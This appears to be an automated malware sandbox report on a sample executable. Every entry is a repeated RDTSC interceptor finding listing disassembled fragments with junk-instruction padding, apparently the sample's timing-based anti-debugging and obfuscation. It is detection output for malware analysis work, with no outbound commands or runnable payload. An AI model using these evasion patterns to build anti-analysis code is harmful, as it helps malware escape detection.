                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA55 second address: 65BA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA63 second address: 65BA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 665368 second address: 665387 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F909CBB3525h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 665387 second address: 6653B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F909C7BD306h 0x00000008 jmp 00007F909C7BD30Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F909C7BD308h 0x00000018 jmp 00007F909C7BD30Fh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 664DDB second address: 664DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 666AEC second address: 666AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 666AF6 second address: 666B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB351Eh 0x00000007 jmp 00007F909CBB351Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F909CBB3520h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 666B29 second address: 666B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6762BC second address: 6762D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jnl 00007F909CBB3516h 0x0000000c je 00007F909CBB3516h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 67E598 second address: 67E5AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 685CB6 second address: 685CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F909CBB3528h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 68D60F second address: 68D615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A306B second address: 5A3092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3520h 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F909CBB351Ah 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 68D480 second address: 68D499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F909C7BD311h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 68D499 second address: 68D49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6964E1 second address: 696514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F909C7BD30Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F909C7BD314h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696514 second address: 69651A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6967F1 second address: 6967F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6967F7 second address: 696804 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696AC6 second address: 696AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696AD1 second address: 696AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696CB2 second address: 696CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F909C7BD306h 0x00000009 jmp 00007F909C7BD311h 0x0000000e popad 0x0000000f pushad 0x00000010 js 00007F909C7BD306h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696CD6 second address: 696CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696FC7 second address: 696FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6A5F8F second address: 6A5F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6ABB53 second address: 6ABB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD45B second address: 6AD460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD460 second address: 6AD46A instructions: 0x00000000 rdtsc 0x00000002 je 00007F909C7BD30Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD46A second address: 6AD486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 jc 00007F909CBB3516h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F909CBB351Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD486 second address: 6AD48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6BC802 second address: 6BC821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F909CBB351Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6BC821 second address: 6BC825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D1442 second address: 6D1446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D1446 second address: 6D144C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D144C second address: 6D1451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D15D1 second address: 6D15E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F909C7BD30Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D15E9 second address: 6D15ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D15ED second address: 6D160B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D160B second address: 6D1622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3521h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D6035 second address: 6D603B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D603B second address: 6D603F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D636A second address: 6D636E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D7C38 second address: 6D7C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D7C3C second address: 6D7C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD316h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB0444 second address: 4EB0459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB0459 second address: 4EB045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB045F second address: 4EB0463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB0463 second address: 4EB04EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD313h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F909C7BD316h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F909C7BD310h 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b pushad 0x0000001c mov cl, 79h 0x0000001e pushfd 0x0000001f jmp 00007F909C7BD313h 0x00000024 or ah, FFFFFFBEh 0x00000027 jmp 00007F909C7BD319h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ecx, dword ptr [ebp+08h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F909C7BD30Dh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB0518 second address: 4EB051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB051E second address: 4EB0522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EB0522 second address: 4EB0526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE05F0 second address: 4EE0605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F909C7BD30Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0605 second address: 4EE0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dh 0x00000005 jmp 00007F909CBB351Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushad 0x00000010 mov esi, 3DF31103h 0x00000015 mov eax, 390BBA5Fh 0x0000001a popad 0x0000001b mov esi, 21DB9D7Bh 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 mov al, 40h 0x00000026 mov eax, ebx 0x00000028 popad 0x00000029 push ebx 0x0000002a jmp 00007F909CBB3520h 0x0000002f mov dword ptr [esp], ecx 0x00000032 pushad 0x00000033 mov ecx, 64FC2F0Dh 0x00000038 pushfd 0x00000039 jmp 00007F909CBB351Ah 0x0000003e sbb cx, B928h 0x00000043 jmp 00007F909CBB351Bh 0x00000048 popfd 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov edx, 6F184696h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0676 second address: 4EE06A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F909C7BD30Bh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F909C7BD315h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE06A8 second address: 4EE06F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F909CBB3526h 0x00000015 jmp 00007F909CBB3525h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE06F1 second address: 4EE073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F909C7BD317h 0x00000009 and ah, FFFFFFEEh 0x0000000c jmp 00007F909C7BD319h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 6EB8185Ah 0x00000020 movsx edx, cx 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE073B second address: 4EE0741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07C9 second address: 4EE07CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07CD second address: 4EE07D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07D3 second address: 4EE07D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07D9 second address: 4EE07DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07DD second address: 4EE07EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07EF second address: 4EE07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07F3 second address: 4EE07F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07F7 second address: 4EE07FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE07FD second address: 4EE0851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F909C7BD313h 0x00000009 sub ecx, 48FDD8DEh 0x0000000f jmp 00007F909C7BD319h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov esi, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F909C7BD314h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0851 second address: 4EE0857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE08D6 second address: 4EE08F9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 699136C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F909C7BD315h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE08F9 second address: 4ED0011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F909CBB351Ch 0x00000011 add eax, 69FD73E8h 0x00000017 jmp 00007F909CBB351Bh 0x0000001c popfd 0x0000001d movzx esi, bx 0x00000020 popad 0x00000021 leave 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F909CBB3521h 0x00000029 adc esi, 6A3EFA06h 0x0000002f jmp 00007F909CBB3521h 0x00000034 popfd 0x00000035 mov edi, ecx 0x00000037 popad 0x00000038 retn 0004h 0x0000003b nop 0x0000003c sub esp, 04h 0x0000003f xor ebx, ebx 0x00000041 cmp eax, 00000000h 0x00000044 je 00007F909CBB367Ah 0x0000004a mov dword ptr [esp], 0000000Dh 0x00000051 call 00007F90A166F6B1h 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F909CBB351Dh 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0011 second address: 4ED0017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0017 second address: 4ED001B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED001B second address: 4ED0029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0029 second address: 4ED002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED002D second address: 4ED0051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, si 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F909C7BD315h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0051 second address: 4ED0061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909CBB351Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0061 second address: 4ED00AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov cx, 89EBh 0x00000012 mov bx, cx 0x00000015 popad 0x00000016 sub esp, 2Ch 0x00000019 jmp 00007F909C7BD30Ah 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F909C7BD310h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F909C7BD30Dh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED00AD second address: 4ED00B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED00B1 second address: 4ED00B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED020F second address: 4ED0213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0213 second address: 4ED0219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0219 second address: 4ED024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB351Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F909CBB351Bh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007F909CBB3521h 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED026A second address: 4ED026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED026E second address: 4ED0274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0274 second address: 4ED030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F909C7BD310h 0x00000010 jg 00007F910D38B4F4h 0x00000016 jmp 00007F909C7BD310h 0x0000001b js 00007F909C7BD33Fh 0x00000021 jmp 00007F909C7BD310h 0x00000026 cmp dword ptr [ebp-14h], edi 0x00000029 jmp 00007F909C7BD310h 0x0000002e jne 00007F910D38B4C4h 0x00000034 jmp 00007F909C7BD310h 0x00000039 mov ebx, dword ptr [ebp+08h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F909C7BD317h 0x00000043 rdtsc
